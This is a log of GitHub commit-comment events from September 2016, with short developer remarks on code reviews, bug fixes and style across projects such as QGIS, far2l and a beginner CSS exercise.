{"id":"4578602332","type":"CommitCommentEvent","actor":{"login":"arnaud-morvan"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19066816,"position":null,"line":null,"path":null,"commit_id":"eba61013574bff36f03f791ec4e1b4fdadce43d5","created_at":"2016-09-17T20:23:26Z","updated_at":"2016-09-17T20:23:26Z","body":"@volaya @nyalldawson \r\nSeems that we are already broken with Qt4.\r\nDoes this means that I should also propose not compatible Qt4 code to fix bugs with Qt5 when needed in processing plugin ?"}},"created_at":"2016-09-17T20:23:26Z"}
{"id":"4578602931","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19066820,"position":null,"line":null,"path":null,"commit_id":"71d9650b4116ecaad202edfbe56397f26677de75","created_at":"2016-09-17T20:23:51Z","updated_at":"2016-09-17T20:23:51Z","body":"hmm, we'll do a revert but it shouldn't have messed with experimentation points at all. I'll do a bit of further testing on my dev center to try and figure out why"}},"created_at":"2016-09-17T20:23:51Z"}
{"id":"4578603051","type":"CommitCommentEvent","actor":{"login":"Matchstic"},"repo":{"name":"QwopJoans/InfoStats2"},"payload":{"comment":{"id":19066821,"position":null,"line":null,"path":null,"commit_id":"7ec27c25eb875a096e2c46417c1d899a981be17e","created_at":"2016-09-17T20:23:56Z","updated_at":"2016-09-17T20:23:56Z","body":"No worries; this should also avoid any freezing when changing brightness. Also, I am keeping an eye on the work you're doing, will be looking to incorporate the changes you're making into IS2 when you're ready."}},"created_at":"2016-09-17T20:23:56Z"}
{"id":"4578605175","type":"CommitCommentEvent","actor":{"login":"QwopJoans"},"repo":{"name":"QwopJoans/InfoStats2"},"payload":{"comment":{"id":19066831,"position":null,"line":null,"path":null,"commit_id":"7ec27c25eb875a096e2c46417c1d899a981be17e","created_at":"2016-09-17T20:25:22Z","updated_at":"2016-09-17T20:25:22Z","body":"Oh wow, that'd be a huge honor, I just add things I like to use in my widgets. This is Lebirava by the way, if you didn't know."}},"created_at":"2016-09-17T20:25:22Z"}
{"id":"4578605702","type":"CommitCommentEvent","actor":{"login":"Kwiboo"},"repo":{"name":"Kwiboo/LibreELEC.tv"},"payload":{"comment":{"id":19066837,"position":null,"line":null,"path":null,"commit_id":"132408bd0c1a1d52cfc47af8480538ed2f13722e","created_at":"2016-09-17T20:25:44Z","updated_at":"2016-09-17T20:25:44Z","body":"@fritsch could this be a better approach for Amlogic passthrough in Kodi? Comments are very welcomed.\r\n\r\nThis limits the modifications in `AESinkALSA` to just `Deinitialize()` and forcing `device 1` for passthrough. Kernel now takes care of setting audio type for HDMI."}},"created_at":"2016-09-17T20:25:44Z"}
{"id":"4578605830","type":"CommitCommentEvent","actor":{"login":"Matchstic"},"repo":{"name":"QwopJoans/InfoStats2"},"payload":{"comment":{"id":19066839,"position":null,"line":null,"path":null,"commit_id":"7ec27c25eb875a096e2c46417c1d899a981be17e","created_at":"2016-09-17T20:25:50Z","updated_at":"2016-09-17T20:25:50Z","body":"Ah; I'll message you directly!"}},"created_at":"2016-09-17T20:25:50Z"}
{"id":"4578608878","type":"CommitCommentEvent","actor":{"login":"Alkallid"},"repo":{"name":"Makuta-Miras/The-Enclave"},"payload":{"comment":{"id":19066850,"position":null,"line":null,"path":null,"commit_id":"7f87234c6490d63b7baa837f48ea1dbfda4c3d83","created_at":"2016-09-17T20:27:54Z","updated_at":"2016-09-17T20:27:54Z","body":"10/10"}},"created_at":"2016-09-17T20:27:54Z"}
{"id":"4578609820","type":"CommitCommentEvent","actor":{"login":"gslowikowski"},"repo":{"name":"rigoford/scalac-scoverage-plugin"},"payload":{"comment":{"id":19066856,"position":null,"line":null,"path":null,"commit_id":"559dbfec0c526a5d0d0b9427aa77a4bf60a5e53f","created_at":"2016-09-17T20:28:30Z","updated_at":"2016-09-17T20:28:30Z","body":"I wanted to merge this PR, but the reports do not look good:\r\n- HTML report - main page (index.html) - ignored statement shouldn't be visible in the table\r\n- HTML report - ignored statement is marked red in code grid - it shouldn't\r\n- HTML report - ignored statement shouldn't be added to statement list\r\n- HTML report - invoked statements + not invoked statements + ignored statements != total statements\r\n- Cobertura XML report - there is no 'ignored' flag, should ignored statements be treated as not invoked? this will lower coverage ratio (e.g. for Coveralls)\r\n\r\nGenerally, why Sonar plugin needs information about ignored lines?\r\n"}},"created_at":"2016-09-17T20:28:30Z"}
{"id":"4578610269","type":"CommitCommentEvent","actor":{"login":"AndreyAkinshin"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19066861,"position":9,"line":9,"path":"src/BenchmarkDotNet.Core/Attributes/Jobs/SimpleJobAttribute.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-17T20:28:50Z","updated_at":"2016-09-17T20:28:50Z","body":"Unfortunally, it's impossible to use attributes with nullable arguments (all attribute arguments should be consts, but you can't create a nullable const)."}},"created_at":"2016-09-17T20:28:50Z"}
{"id":"4578611428","type":"CommitCommentEvent","actor":{"login":"CucumisSativus"},"repo":{"name":"CucumisSativus/ddd_crm"},"payload":{"comment":{"id":19066871,"position":5,"line":9,"path":"app/models/user.rb","commit_id":"956991e36afea1f0d466e096bf603ecb18bd79dd","created_at":"2016-09-17T20:29:44Z","updated_at":"2016-09-17T20:29:44Z","body":"Inspirowałem się [hanami](http://hanamirb.org/guides/) chociaż sporo tutaj robiłem na czuja, po prostu wydawało mi się że tak powinno być.\r\nJeżeli chodzi o blogi książki to polecam:\r\n[bloga arkency](https://blog.arkency.com/)\r\n[fearless recatoring] (http://rails-refactoring.com/)\r\n\r\nI jeżeli chodzi o takie moje luźne przemyślenia to:\r\n* nie pisz repozytoriów samemu, rzuć okiem na [roma](http://rom-rb.org/), chociaż dokumentacja nie powala\r\n* jak już to napisałem to stwierdziłem, że query objecty lepiej działają kiedy przyjmują i zwracają relacje - można je wtedy fajnie chainować\r\n* to co tutaj zrobiłem z commandami wydaje mi się całkiem spoko, chociaż może warto jednak rzucić okiem na dry-types i dry-validation autoreklama: [tutorial na moim blogu](http://cucumbersome.net/2016/09/06/rails-form-objects-with-dry-rb.html])"}},"created_at":"2016-09-17T20:29:44Z"}
{"id":"4578616216","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19066898,"position":2,"line":2,"path":"00-HTML-CSS-basics/css/2.5/styles/styles.css","commit_id":"209b43b4bcba694daeb977adc64f1c5bd88f41d4","created_at":"2016-09-17T20:33:04Z","updated_at":"2016-09-17T20:33:04Z","body":"wrong indentation"}},"created_at":"2016-09-17T20:33:04Z"}
{"id":"4578616567","type":"CommitCommentEvent","actor":{"login":"wmoldwin"},"repo":{"name":"oe-alliance/AutoBouquetsMaker"},"payload":{"comment":{"id":19066901,"position":5,"line":22,"path":"AutoBouquetsMaker/providers/sat_0130_bistv.xml","commit_id":"86fbb03d4a73525b615a09408148d45a50b3fa31","created_at":"2016-09-17T20:33:17Z","updated_at":"2016-09-17T20:33:17Z","body":"I think it is better to stick with \"Hot Bird\" as the bouquet region name here. Bis TV has two separate bouquets on two separate satellites, and they do have different channel lineups. Also, perhaps in future a dependent provider can be added for the other bouquet (I can't do it as I don't have a dish pointed at 5°W) and the region selector can be used to choose between them."}},"created_at":"2016-09-17T20:33:17Z"}
{"id":"4578619292","type":"CommitCommentEvent","actor":{"login":"Grz3s"},"repo":{"name":"ACID-Scripts/WOTLK"},"payload":{"comment":{"id":19066914,"position":null,"line":null,"path":null,"commit_id":"fba80f5353f752f68f4d2bd67e806668a7cb44f7","created_at":"2016-09-17T20:35:10Z","updated_at":"2016-09-17T20:35:10Z","body":"part of:\r\nhttps://github.com/unified-db/Database/commit/17f8f6425a4835591606930ab94694d85fd707c0"}},"created_at":"2016-09-17T20:35:10Z"}
{"id":"4578619950","type":"CommitCommentEvent","actor":{"login":"MiningPotatoes"},"repo":{"name":"michaelgira23/Programming-Club-Guides"},"payload":{"comment":{"id":19066917,"position":null,"line":null,"path":null,"commit_id":"8035b657b595800bbf332fee06e4757e124d30a4","created_at":"2016-09-17T20:35:39Z","updated_at":"2016-09-17T20:35:39Z","body":"gdi i do this every time"}},"created_at":"2016-09-17T20:35:39Z"}
{"id":"4578621326","type":"CommitCommentEvent","actor":{"login":"michaelgira23"},"repo":{"name":"michaelgira23/Programming-Club-Guides"},"payload":{"comment":{"id":19066924,"position":null,"line":null,"path":null,"commit_id":"8035b657b595800bbf332fee06e4757e124d30a4","created_at":"2016-09-17T20:36:36Z","updated_at":"2016-09-17T20:36:36Z","body":"# Christ, Nick"}},"created_at":"2016-09-17T20:36:36Z"}
{"id":"4578622013","type":"CommitCommentEvent","actor":{"login":"rduivenvoorde"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19066928,"position":null,"line":null,"path":null,"commit_id":"59583e97deef732f6884a54b518fc34225fd6012","created_at":"2016-09-17T20:37:03Z","updated_at":"2016-09-17T20:37:03Z","body":"@jef-n yep, noticed that too. Thanks"}},"created_at":"2016-09-17T20:37:03Z"}
{"id":"4578622178","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19066930,"position":15,"line":15,"path":"00-HTML-CSS-basics/css/2.5/styles/styles.css","commit_id":"209b43b4bcba694daeb977adc64f1c5bd88f41d4","created_at":"2016-09-17T20:37:13Z","updated_at":"2016-09-17T20:37:13Z","body":"`padding: 1px;` is the same. Take a look to the shorthand section of http://www.w3schools.com/css/css_padding.asp"}},"created_at":"2016-09-17T20:37:13Z"}
{"id":"4578622597","type":"CommitCommentEvent","actor":{"login":"IBPX"},"repo":{"name":"goatattack/goatattack"},"payload":{"comment":{"id":19066933,"position":null,"line":null,"path":null,"commit_id":"28ccdf8c98f486ff9ce7d25f36321c3e3eae3543","created_at":"2016-09-17T20:37:30Z","updated_at":"2016-09-17T20:37:30Z","body":"@ObaniGemini I think we're misunderstanding each other.\r\n\r\nI mean, of course the game needs music, that's important. My point was, you don't need the ability to play your own music. If you want to do that, you should turn the music off and play your own."}},"created_at":"2016-09-17T20:37:30Z"}
{"id":"4578622888","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19066936,"position":null,"line":null,"path":null,"commit_id":"c1ebc1769b2f3baef9324767773abc0d3216db5a","created_at":"2016-09-17T20:37:42Z","updated_at":"2016-09-17T20:37:42Z","body":"I'd like to try doubling this bonus..."}},"created_at":"2016-09-17T20:37:42Z"}
{"id":"4578622914","type":"CommitCommentEvent","actor":{"login":"AmatCoder"},"repo":{"name":"AmatCoder/mednaffe"},"payload":{"comment":{"id":19066937,"position":null,"line":null,"path":null,"commit_id":"e58c719eb6e17b20637283d14ec097ae3c3c4866","created_at":"2016-09-17T20:37:43Z","updated_at":"2016-09-17T20:37:43Z","body":"You are right again. \r\nThere are 15 systems now, there were 14 before Saturn inclusion...So it was wrong since ages. :-(\r\nThanks for insisting on this."}},"created_at":"2016-09-17T20:37:43Z"}
{"id":"4578623371","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19066942,"position":14,"line":14,"path":"00-HTML-CSS-basics/css/2.5/styles/styles.css","commit_id":"209b43b4bcba694daeb977adc64f1c5bd88f41d4","created_at":"2016-09-17T20:38:05Z","updated_at":"2016-09-17T20:38:05Z","body":"Yes, it does. ;)"}},"created_at":"2016-09-17T20:38:05Z"}
{"id":"4578623546","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19066943,"position":22,"line":22,"path":"00-HTML-CSS-basics/css/2.5/styles/styles.css","commit_id":"209b43b4bcba694daeb977adc64f1c5bd88f41d4","created_at":"2016-09-17T20:38:12Z","updated_at":"2016-09-17T20:38:12Z","body":"Yes, it does. ;)"}},"created_at":"2016-09-17T20:38:12Z"}
{"id":"4578624935","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19066952,"position":42,"line":42,"path":"00-HTML-CSS-basics/css/2.5/styles/styles.css","commit_id":"209b43b4bcba694daeb977adc64f1c5bd88f41d4","created_at":"2016-09-17T20:39:17Z","updated_at":"2016-09-17T20:39:17Z","body":"same as `margin: 10px 15px;`"}},"created_at":"2016-09-17T20:39:17Z"}
{"id":"4578625804","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19066954,"position":46,"line":46,"path":"00-HTML-CSS-basics/css/2.5/styles/styles.css","commit_id":"209b43b4bcba694daeb977adc64f1c5bd88f41d4","created_at":"2016-09-17T20:39:56Z","updated_at":"2016-09-17T20:39:56Z","body":"You can combine this with the previous rule."}},"created_at":"2016-09-17T20:39:56Z"}
{"id":"4578626518","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19066956,"position":59,"line":59,"path":"00-HTML-CSS-basics/css/2.5/styles/styles.css","commit_id":"209b43b4bcba694daeb977adc64f1c5bd88f41d4","created_at":"2016-09-17T20:40:26Z","updated_at":"2016-09-17T20:40:26Z","body":"same as `margin: 15px`"}},"created_at":"2016-09-17T20:40:26Z"}
{"id":"4578627328","type":"CommitCommentEvent","actor":{"login":"MiningPotatoes"},"repo":{"name":"michaelgira23/Programming-Club-Guides"},"payload":{"comment":{"id":19066960,"position":null,"line":null,"path":null,"commit_id":"8035b657b595800bbf332fee06e4757e124d30a4","created_at":"2016-09-17T20:41:04Z","updated_at":"2016-09-17T20:41:04Z","body":"i did not come here to be harassed for my unobservance"}},"created_at":"2016-09-17T20:41:04Z"}
{"id":"4578628646","type":"CommitCommentEvent","actor":{"login":"lieff"},"repo":{"name":"elfmz/far2l"},"payload":{"comment":{"id":19066968,"position":null,"line":null,"path":null,"commit_id":"11b16ec03fb555482d76a63c2885d94a611ff18e","created_at":"2016-09-17T20:42:09Z","updated_at":"2016-09-17T20:42:09Z","body":"Чтыбы крашнулось без этого патча? Просто войти в rar. По стеку было видно что классы перепутались и вызывался деструктор от custom бэкэнда вместо rar. Проявляться стало на убунте при мереходе на cmake как раз."}},"created_at":"2016-09-17T20:42:09Z"}
{"id":"4578628710","type":"CommitCommentEvent","actor":{"login":"jifeon"},"repo":{"name":"redco/goose-proxy-rotator"},"payload":{"comment":{"id":19066970,"position":1,"line":1,"path":"Dockerfile","commit_id":"5ee433508ab3000467c8236532c6a80436ca2dd5","created_at":"2016-09-17T20:42:11Z","updated_at":"2016-09-17T20:42:11Z","body":"It's f*cking awesome"}},"created_at":"2016-09-17T20:42:11Z"}
{"id":"4578629199","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19066974,"position":69,"line":69,"path":"00-HTML-CSS-basics/css/2.5/styles/styles.css","commit_id":"209b43b4bcba694daeb977adc64f1c5bd88f41d4","created_at":"2016-09-17T20:42:35Z","updated_at":"2016-09-17T20:42:35Z","body":"We should not use decimal numbers for pixels."}},"created_at":"2016-09-17T20:42:35Z"}
{"id":"4578629558","type":"CommitCommentEvent","actor":{"login":"nyura123"},"repo":{"name":"anna24tutor/anna24tutor.github.io"},"payload":{"comment":{"id":19066978,"position":22,"line":123,"path":"index.html","commit_id":"128cd6209244e82661d8253b9e5f0008c9d81282","created_at":"2016-09-17T20:42:54Z","updated_at":"2016-09-17T20:42:54Z","body":"???"}},"created_at":"2016-09-17T20:42:54Z"}
{"id":"4578631356","type":"CommitCommentEvent","actor":{"login":"aria1995"},"repo":{"name":"aria1995/aria1995"},"payload":{"comment":{"id":19066983,"position":4,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-17T20:44:18Z","updated_at":"2016-09-17T20:44:18Z","body":"tlgrmid"}},"created_at":"2016-09-17T20:44:18Z"}
{"id":"4578631517","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19066984,"position":78,"line":78,"path":"00-HTML-CSS-basics/css/2.5/styles/styles.css","commit_id":"209b43b4bcba694daeb977adc64f1c5bd88f41d4","created_at":"2016-09-17T20:44:24Z","updated_at":"2016-09-17T20:44:24Z","body":"Instead of `min-width` and `max-width` use `width`."}},"created_at":"2016-09-17T20:44:24Z"}
{"id":"4578632891","type":"CommitCommentEvent","actor":{"login":"rohithk261"},"repo":{"name":"rohithk261/maven-repo-java"},"payload":{"comment":{"id":19066993,"position":null,"line":null,"path":null,"commit_id":"030066d968dcc504c420d15e396d45843dd435cb","created_at":"2016-09-17T20:45:32Z","updated_at":"2016-09-17T20:45:32Z","body":"test"}},"created_at":"2016-09-17T20:45:32Z"}
{"id":"4578633140","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19066995,"position":null,"line":null,"path":null,"commit_id":"a3eaa46db038ed929d36810bd1789f782194a17b","created_at":"2016-09-17T20:45:44Z","updated_at":"2016-09-17T20:45:44Z","body":"oh, that you have to set the schematic to 1,000 for it to actually show 10,000,000. Anything between 1 and 999 works as normal. Thats whY i called it dirty lol, because you can't set a value between 999 and 10,000,000 it's either 999 or 10,000,000 no inbetween"}},"created_at":"2016-09-17T20:45:44Z"}
{"id":"4578634189","type":"CommitCommentEvent","actor":{"login":"gemypham"},"repo":{"name":"gemypham/DM-Class"},"payload":{"comment":{"id":19067002,"position":null,"line":null,"path":null,"commit_id":"95231bab603a3aa08f0d26b866da054217333bf7","created_at":"2016-09-17T20:46:35Z","updated_at":"2016-09-17T20:46:35Z","body":"oke fine "}},"created_at":"2016-09-17T20:46:35Z"}
{"id":"4578636276","type":"CommitCommentEvent","actor":{"login":"rohithk261"},"repo":{"name":"rohithk261/maven-repo-java"},"payload":{"comment":{"id":19067010,"position":1,"line":1,"path":"README.md","commit_id":"030066d968dcc504c420d15e396d45843dd435cb","created_at":"2016-09-17T20:48:06Z","updated_at":"2016-09-17T20:48:06Z","body":"public class HelloWorld {\r\n   public static void main(String[] args) {\r\n      // Prints \"Hello, World\" in the terminal window.\r\n      System.out.println(\"Hello, World\");\r\n   }\r\n}"}},"created_at":"2016-09-17T20:48:06Z"}
{"id":"4578636314","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"classicdb/database"},"payload":{"comment":{"id":19067011,"position":null,"line":null,"path":null,"commit_id":"b631370dfcfa178a665c8732cbc9ba60932be6b4","created_at":"2016-09-17T20:48:08Z","updated_at":"2016-09-17T20:48:08Z","body":"Thanks. :+1: \r\nThat column's name is just stupid: what need to specify \"condition\" for the entry? Its the conditions table, Sherlock..."}},"created_at":"2016-09-17T20:48:08Z"}
{"id":"4578636593","type":"CommitCommentEvent","actor":{"login":"rohithk261"},"repo":{"name":"rohithk261/maven-repo-java"},"payload":{"comment":{"id":19067015,"position":null,"line":null,"path":null,"commit_id":"030066d968dcc504c420d15e396d45843dd435cb","created_at":"2016-09-17T20:48:18Z","updated_at":"2016-09-17T20:48:18Z","body":"public class HelloWorld {\r\n   public static void main(String[] args) {\r\n      // Prints \"Hello, World\" in the terminal window.\r\n      System.out.println(\"Hello, World\");\r\n   }\r\n}"}},"created_at":"2016-09-17T20:48:18Z"}
{"id":"4578638773","type":"CommitCommentEvent","actor":{"login":"nortikin"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":19067031,"position":null,"line":null,"path":null,"commit_id":"6e688cdbe8237e16e6e1544098694c44722d12f7","created_at":"2016-09-17T20:49:43Z","updated_at":"2016-09-17T20:49:43Z","body":"i have this problem on ROSA linux. other distros are ok. will handle certificate later. Sorry for this temporery ugly \"solution\". :sob: "}},"created_at":"2016-09-17T20:49:43Z"}
{"id":"4578641433","type":"CommitCommentEvent","actor":{"login":"Levysantiago"},"repo":{"name":"Levysantiago/repository"},"payload":{"comment":{"id":19067039,"position":4,"line":2,"path":"README.md","commit_id":"dccad99d4aeb633441f87880702643b4ded4b581","created_at":"2016-09-17T20:51:30Z","updated_at":"2016-09-17T20:51:30Z","body":"asd"}},"created_at":"2016-09-17T20:51:30Z"}
{"id":"4578641792","type":"CommitCommentEvent","actor":{"login":"joolswills"},"repo":{"name":"RetroPie/SDL-mirror"},"payload":{"comment":{"id":19067040,"position":null,"line":null,"path":null,"commit_id":"57fc057a74168974d7db52e6c8ae4bee9b764930","created_at":"2016-09-17T20:51:46Z","updated_at":"2016-09-17T20:51:46Z","body":"Please feel free to create a branch on the repo (Let me know if you lack access - you should have access though according to the admin)."}},"created_at":"2016-09-17T20:51:46Z"}
{"id":"4578642013","type":"CommitCommentEvent","actor":{"login":"wuqd666"},"repo":{"name":"wuqd666/lastOne"},"payload":{"comment":{"id":19067043,"position":null,"line":null,"path":null,"commit_id":"35d0755ecdf157aaa0e29db6081a19ef3c033458","created_at":"2016-09-17T20:51:56Z","updated_at":"2016-09-17T20:51:56Z","body":"人工智障 马上开始"}},"created_at":"2016-09-17T20:51:56Z"}
{"id":"4578642268","type":"CommitCommentEvent","actor":{"login":"dkoper"},"repo":{"name":"cloudfoundry/cli"},"payload":{"comment":{"id":19067044,"position":12,"line":39,"path":"cf/commands/space/delete_space.go","commit_id":"f96055a3ce7c4795d5f97de0e4b534009df6cfd4","created_at":"2016-09-17T20:52:06Z","updated_at":"2016-09-17T20:52:06Z","body":"ORG should be within the brackets"}},"created_at":"2016-09-17T20:52:06Z"}
{"id":"4578643029","type":"CommitCommentEvent","actor":{"login":"nacx"},"repo":{"name":"jclouds/jclouds"},"payload":{"comment":{"id":19067051,"position":null,"line":null,"path":null,"commit_id":"76995a363d1cabaee26066b52a476ae28c4fd638","created_at":"2016-09-17T20:52:42Z","updated_at":"2016-09-17T20:52:42Z","body":"@andrewgaul Looks like this introduces a coupe [checkstyle viilations](https://jclouds.ci.cloudbees.com/job/jclouds/3479/org.apache.jclouds.provider$aws-s3/violations/file/src/test/java/org/jclouds/aws/s3/blobstore/integration/AWSS3BlobSignerLiveTest.java/)."}},"created_at":"2016-09-17T20:52:42Z"}
{"id":"4578643468","type":"CommitCommentEvent","actor":{"login":"joschiwald"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19067054,"position":null,"line":null,"path":null,"commit_id":"b5035582b656df780e8ebeeb3647288bf1be8256","created_at":"2016-09-17T20:53:03Z","updated_at":"2016-09-17T20:53:03Z","body":"all spells with SPELL_DAMAGE_CLASS_NONE should ignore sp"}},"created_at":"2016-09-17T20:53:03Z"}
{"id":"4578643529","type":"CommitCommentEvent","actor":{"login":"jtreuting"},"repo":{"name":"SmarterApp/TDS_Common"},"payload":{"comment":{"id":19067055,"position":16,"line":16,"path":"src/main/java/tds/common/data/mysql/InstantPropertyEditorSupport.java","commit_id":"eab8265cecca8b2bb5f87a67e777377b7feca9dc","created_at":"2016-09-17T20:53:06Z","updated_at":"2016-09-17T20:53:06Z","body":"I might be reading this wrong, but a couple questions.  Does a date time coming from MySQL have the timezone as part of it?  I think to have to local date time work it would need that.\r\n\r\nI thought we were going to say that all dates and times in the DB are UTC so can we assume that here?\r\n\r\nI might be missing something because I'm just reviewing quickly on my phone.  But I think I tried something like this before thinking I could get an offset by querying the DB once to get the time and then storing it so we wouldn't have to query the DB each time we needed now in the legacy code.  And I ran into issues with it."}},"created_at":"2016-09-17T20:53:06Z"}
{"id":"4578643692","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19067056,"position":19,"line":47,"path":"00-HTML-CSS-basics/css/2.3/styles/styles.css","commit_id":"6094f0036d2fd858cc2cfa9df106d3f599abcb22","created_at":"2016-09-17T20:53:13Z","updated_at":"2016-09-17T20:53:13Z","body":"Great selector!"}},"created_at":"2016-09-17T20:53:13Z"}
{"id":"4578644297","type":"CommitCommentEvent","actor":{"login":"JakeDaBoss"},"repo":{"name":"JakeDaBoss/Prospector-2.1"},"payload":{"comment":{"id":19067062,"position":null,"line":null,"path":null,"commit_id":"6b428c98df0aeee729e8a19fb83de5de858c4b7d","created_at":"2016-09-17T20:53:36Z","updated_at":"2016-09-17T20:53:36Z","body":"It'll do the trick."}},"created_at":"2016-09-17T20:53:36Z"}
{"id":"4578646273","type":"CommitCommentEvent","actor":{"login":"alfaproject"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19067071,"position":null,"line":null,"path":null,"commit_id":"6503be51d6b1094086c2d7f623d256da66bec141","created_at":"2016-09-17T20:54:58Z","updated_at":"2016-09-17T20:54:58Z","body":"Exactly, so 1024 inclusive is large, not medium."}},"created_at":"2016-09-17T20:54:58Z"}
{"id":"4578646316","type":"CommitCommentEvent","actor":{"login":"dagochen"},"repo":{"name":"classicdb/database"},"payload":{"comment":{"id":19067072,"position":null,"line":null,"path":null,"commit_id":"b631370dfcfa178a665c8732cbc9ba60932be6b4","created_at":"2016-09-17T20:55:01Z","updated_at":"2016-09-17T20:55:01Z","body":"there are many more inconsistencies where some keys are 'Entry' and some others are 'ID'. Maybe we should fix that"}},"created_at":"2016-09-17T20:55:01Z"}
{"id":"4578646816","type":"CommitCommentEvent","actor":{"login":"invy"},"repo":{"name":"elfmz/far2l"},"payload":{"comment":{"id":19067074,"position":null,"line":null,"path":null,"commit_id":"11b16ec03fb555482d76a63c2885d94a611ff18e","created_at":"2016-09-17T20:55:21Z","updated_at":"2016-09-17T20:55:21Z","body":"Не, чтобы stringlist протвестировать, т.к. я его заменил по-быстрому на stl но протестировать не ясно как.\r\n\r\nА крэшится фар и с этим патчем, и крэшится вот по этому:\r\n@@ -215,10 +215,11 @@ BOOL WINAPI _export RAR_CloseArchive(struct ArcInfo *Info)\r\n     Info->Flags|=AF_HDRENCRYPTED;\r\n \r\n   *Password=0;\r\n \r\n   RARCloseArchive(hArcData);\r\n+  return true;\r\n }\r\n \r\n DWORD WINAPI _export RAR_GetSFXPos(void)\r\n {\r\n   return SFXSize;\r\n"}},"created_at":"2016-09-17T20:55:21Z"}
{"id":"4578647112","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"postgred/myrubycource"},"payload":{"comment":{"id":19067075,"position":9,"line":21,"path":"movie.rb","commit_id":"cc9acd8248ef9abfe07a5dc269f1091a3450ae46","created_at":"2016-09-17T20:55:33Z","updated_at":"2016-09-17T20:55:33Z","body":"Не, идея ж не такова. Идея такова, предположим у нас есть чистая комедия:\r\n* `movie.has_genre?('Comedy') # => true` (жанр такой существует и  есть у этого фильма)\r\n* `movie.has_genre?('Drama') # => false` (жанр существует, у этого фильма нет)\r\n* `movie.has_genre?('Cmoedy') # ошибка!` (жанра не существует в природе)"}},"created_at":"2016-09-17T20:55:33Z"}
{"id":"4578647924","type":"CommitCommentEvent","actor":{"login":"c3r1c3"},"repo":{"name":"jp9000/obs-studio"},"payload":{"comment":{"id":19067082,"position":null,"line":null,"path":null,"commit_id":"39592ff5ebb9aa641ae460b7c044e3fc1cc0196f","created_at":"2016-09-17T20:56:05Z","updated_at":"2016-09-17T20:56:05Z","body":"SuslikV, you do realize that if you have a 2nd monitor, and put OBS on said 2nd monitor, you can see your switches/tallies?\r\n\r\nIf you don't have 2+ monitors while streaming, that's like using consumer cameras without tally on a news set. Not OBS' fault if your setup isn't adequate to properly utilize the Scene Switcher plugin/option."}},"created_at":"2016-09-17T20:56:05Z"}
{"id":"4578649184","type":"CommitCommentEvent","actor":{"login":"tyarkoni"},"repo":{"name":"tyarkoni/featureX"},"payload":{"comment":{"id":19067085,"position":null,"line":null,"path":null,"commit_id":"09169bb6f214fc8362b2c47cb88f9cf89cc4b348","created_at":"2016-09-17T20:57:01Z","updated_at":"2016-09-17T20:57:01Z","body":"homebrew only works on OS X, and the existing travis-ci jobs run on linux. Maybe try `apt-get install tesseract-ocr`?"}},"created_at":"2016-09-17T20:57:01Z"}
{"id":"4578653422","type":"CommitCommentEvent","actor":{"login":"matthew9671"},"repo":{"name":"matthew9671/Presimation"},"payload":{"comment":{"id":19067097,"position":null,"line":null,"path":null,"commit_id":"0c69bd63f22565e54584d69603260aa8ca79304f","created_at":"2016-09-17T20:59:53Z","updated_at":"2016-09-17T20:59:53Z","body":"Nice catch!"}},"created_at":"2016-09-17T20:59:53Z"}
{"id":"4578655983","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19067107,"position":23,"line":23,"path":"00-HTML-CSS-basics/css/2.5/layout.html","commit_id":"aa0f83ea3fa43d15154b2bfa888fabaacfb68bf9","created_at":"2016-09-17T21:01:24Z","updated_at":"2016-09-17T21:01:24Z","body":"Instead of `<br>` add a margin to the `<ol>`"}},"created_at":"2016-09-17T21:01:24Z"}
{"id":"4578656494","type":"CommitCommentEvent","actor":{"login":"demhydraz"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19067110,"position":57,"line":189,"path":"experiments/amulet/design/design-old.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-17T21:01:42Z","updated_at":"2016-09-17T21:01:42Z","body":"Minor nitpick; This is not an union, it's a sum"}},"created_at":"2016-09-17T21:01:42Z"}
